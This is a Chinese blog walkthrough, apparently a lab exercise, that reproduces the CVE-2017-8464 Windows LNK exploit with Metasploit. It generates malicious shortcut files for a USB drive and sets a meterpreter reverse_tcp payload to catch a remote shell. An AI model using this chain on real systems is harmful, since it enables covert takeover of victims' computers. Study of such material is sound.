震网三代cve_2017_8464漏洞复现

最新推荐文章于 2024-04-21 14:08:32 发布
最新推荐文章于 2024-04-21 14:08:32 发布
阅读量1.3k 收藏 4
点赞数
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/K17010/article/details/79826591
版权

影响版本:

 

windows 10

windwos RT 8.1

windows 8.1

windows 7

windows server 2016

windows server 2012 R2

windows server 2012

windows server 2008 R2

windows server 2008

 

以下文章中<   >里的内容为需要输入的代码,输入的代码也会用标记出来

 

攻击机:kali,ip:192.168.83.128

靶机:win10

准备工作:下载最新的zip包,下载完成后将压缩包内modules/exploits/windows/fileformat中的cve_2017_8464_lnk_rce.rb复制到目录/usr/share/metasploit-framework/modules/exploits/windows/fileformat下。


2.仅复制rb文件会出错,须再将压缩包内data/exploits中的cve-2017-8464文件夹复制到/usr/share/metasploit-framework/data/exploits中。

打开metaploit,msfconsole,

<msfconsole>

搜索cve_2017_8464<search cve_2017_8464>

 

 

使用exploit/windows/fileformat/cve_2017_8464_lnk_rce攻击模块

<use exploit/windows/fileformat/cve_2017_8464_lnk_rce>:

 

可以用<show options>查看设置是否成功

然后我们需要加载一个攻击模块,

<set payload windows/meterpreter/reverse_tcp>

中间可以用<ifconfig>查看攻击机的ip

设置攻击机的ip

<set lhost 192.168.83.128>

然后<exploit>运行(run应该也可以)会生成许多lnk文件

现在我们要将这些lnk文件复制到U盘里,这些lnk文件会自动保存到root/.msf4/local/目录下,注意,mf4是隐藏文件

现在,回到kali,使用监听模块,

<use multi/handler>

回车,然后加载一个payload(这里不小心错输入成paylaod居然也成功了)

<set payload windows/meterpreter/reverse_tcp>(以上24个文件其实只需要2个,但是不确定靶机的U盘系统为E盘或是D盘等等,所以直接保留了D到Z共23个文件,例如:如果靶机系统U盘为E盘只需要保留FlashPlayer_E和FlashPlayerCPLApp.cpl就可以)

设置好攻击机的ip(这里我又用ifconfig查看了ip)

<set lhost 192.168.83.128>

然后运行

<exploit>

现在,将U盘插入靶机,如果设置自动播放,在攻击机中会反弹一个meterpreter,如果未设置,在靶机中打开下面标记文件也可以

 

<shell>

拿到shell

 

陈晨0
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
msf下的LNK漏洞复现
极光时流
08-02 347
1.漏洞环境及攻击系统 漏洞环境 靶机: win7 x64 :192.168.1.102 攻击机:kali x64 :192.168.1.104 漏洞利用 1.kali 主机下载 cve_2017_8464_lnk_rce.rb: wget https://raw.githubusercontent.com/ykoster/metasploit-framework/169e00bf3442447...
CVE-2017-8464复现
qq_41772873的博客
03-02 1040
前言 CVE-2017-8464又称远程快捷方式漏洞 攻击者可以向用户呈现包含恶意的.LNK文件和相关联的恶意二进制文件的可移动驱动器或远程共享。 当用户此驱动器(或远程共享)时,恶意二进制程序将在目标系统上执行攻击者选择的代码,成功利用此漏洞的攻击者可以获得与本地用户相同的用户权限。 注释:.LNK是用于指向其他文件的一种文件,这些文件通常称为快捷方式文件,通常它以快捷方式放在硬盘上,以方便使用...
网络安全之SQL注入漏洞复现(中篇)(技术进阶)
最新发布
weixin_70911257的博客
04-21 1247
在我们手工注入时,我们应当根据实际情况判断用那种注入,以及要知道每一种注入方法的原理,手工注入固然慢,但是这才是灵魂所在,使用sqlmap工具虽然高效但是没有灵魂嘞。
漏洞预警】CVE-2017-8464 震网三代漏洞复现
weixin_30613343的博客
08-06 242
早在6月13日,微软发布补丁修复编号为CVE-2017-8464漏洞,本地用户或远程攻击者可以利用该漏洞生成特制的快捷方式,并通过可移动设备或者远程共享的方式导致远程代码执行,追溯到以前,NSA就承认利用过相似漏洞且以“Olympic Game”为代号研发震网病毒,来阻止伊朗发展核武。 受影响版本 Windows 7 Windows 8.1 Windows RT 8.1...
CVE-2017-8464震网3.0漏洞分析与复现
weixin_45484297的博客
03-29 2159
概述:微软在2017年6月份的补丁中修补了一个快捷方式(CVE-2107-8464)的漏洞,公告称此漏洞被国家背景的网络攻击所使用来实施攻击,该漏洞也被称为震网三代,随后Metasploit上发布了该漏洞的PoC。官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危。本次实验主要分为漏洞复现和poc原理分析两部分,通过实验理清该漏洞可能的的攻击途径以及如何防护。 1.漏洞介绍 该漏洞的原理同2010年美国和以色列入
kaliCVE-2017-8464利用
我的学习笔记
02-28 535
参考:https://www.exploit-db.com/exploits/42382https://www.youtube.com/watch?v=nKZTUnjt2VsMicrosoft LNK RCE Exploit下载42382.rb文件 mv 42382.rb CVE_2017_8464_LINK_Rce.rb mv CVE_2017_84...
CVE-2017-8464(震网三代)复现
andiao1218的博客
11-05 472
开启msf root@sch01ar:~# msfconsole 设置模块 msf > use exploit/windows/fileformat/cve_2017_8464_lnk_rce 设置payload msf exploit(cve_2017_8464_lnk_rce) > set payload windows/x64/...
震网三代CVE-2017-8464
m0_57379855的博客
03-31 2340
震网三代CVE-2017-8464CVE-2017-8464环境准备利用原理漏洞利用后渗透 CVE-2017-8464 说明: 2017年6月13日,微软官方发布编号为CVE-2017-8464漏洞公告,官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危 传播的载体一般是LNK ,LNK是windows系统内应用程序快捷方式文件的文件类型后缀名。 危害: 被攻击机插入存在攻击lnk的U盘后会反弹shell,
cve_2017_7269.zip
03-03
【标题】:“CVE-2017-7269.zip”是一个与安全漏洞相关的压缩文件,其中包含了一个名为“cve_2017_7269.rb”的脚本,该脚本可能用于复现一个特定的安全漏洞。这个漏洞被称为CVE-2017-7269,它在2017年被公开披露,对...
cve_2017_7269.rb
04-11
IIS6.0远程代码执行漏洞,本文件需要配合MSF使用,使用前把文件放在//usr/share/metasploit-framework/modules/exploits/windows/iis/下
CVE_2017_16995
05-17
**CVE_2017_16995:Linux内核中的BPF(Berkeley Packet Filter)安全漏洞** 在2017年,安全研究人员发现了一个名为CVE_2017_16995的严重漏洞,该漏洞影响了Linux内核的BPF(Berkeley Packet Filter)子系统。BPF是...
浅谈Node.js CVE-2017-14849 漏洞分析(详细步骤)
10-19
【Node.js CVE-2017-14849 漏洞分析】 Node.js 是一个基于 Chrome V8 引擎的 JavaScript 运行时,它提供了高效的事件驱动、非阻塞 I/O 模型,使得开发高性能的网络应用变得简单。Express,则是建立在 Node.js 平台...
利用CVE-2017-8464漏洞制作病毒U盘攻击
RockHan
01-09 2653
利用CVE-2017-8464漏洞制作病毒U盘 漏洞简介 在“震网行动”中攻击者利用LNK快捷方式漏洞成功入侵了工控系统,并进一步利用漏洞做摆渡攻击,入侵核心工控系统,LNK漏洞危害级别为高危,用户只要是浏览或查看了存 在病毒的LNK文件,不需要用户点击,就会执行入侵者构造好的恶意代码。 病毒U盘制作 使用kali中msfconsole攻击模块生成病毒U盘文件。 1、启动msfconso...
CVE-2017-8464漏洞复现
nicedreem的博客
02-14 128
CVE-2017-8464复现
CVE-2017-8464 分析
weixin_30814319的博客
12-28 848
目录 CVE-2017-8464(stuxnet 3.0) 分析 0xFF 前言 0x00 分析工具 0x01 漏洞复现 1)、生成一个DLL用于测试 2)、构造一个恶意的lnk二进制文件 3)、RUA! ...
震网三代漏洞复现CVE-2017-8464
1匹黑马
02-22 1201
文章目录影响版本危害漏洞原理漏洞复现任务环境创建EXP获取靶机权限利用Powershell获取权限修复建议 影响版本 Windows 7 Windows 8.1 Windows RT 8.1 Windows 10 Windows Server 2008 Windows Server 2008 R2 Windows Server 2012 Windows Server 2012 R2 ...
CVE-2017-8464远程命令执行漏洞复现
WFC1006848997的博客
01-12 1431
CVE-2017-8464远程命令执行漏洞复现 漏洞描述 2017年6月13日,微软官方发布编号为CVE-2017-8464漏洞公告,官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危 Windows系统通过解析 .LNK 后缀文件时,是使用二进制来解析的,而当恶意的二进制代码被系统识别执行的时候就可以实现远程代码执行,由于是在explorer.exe进程中运行的,所以load进内存的时候与当前用户具有相同的权
MSF之CVE-2017-8464远程命令执行漏洞复现
极光时流
12-02 3276
MSF之CVE-2017-8464远程命令执行漏洞复现准备扫描漏洞 准备 实验准备环境: 被攻击机:虚拟机win2008x64位系统,其IP为:192.168.1.107 攻击机:虚拟机kali系统,其IP为:192.168.1.111 攻击工具:kali自带的msfconsole工具 扫描漏洞kali终端中输入msfconsole cd 下载/ msfvenom -p windows...
cve-2017-8464复现
04-28
CVE-2017-8464是一个Windows系统中的漏洞,其根本原因是Windows中存在一个叫做LNK文件的文件格式,在特定情况下LNK文件可以被用来攻击系统。攻击者可以通过操纵LNK文件来让受害者点击恶意文件或网站,从而使得攻击者...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值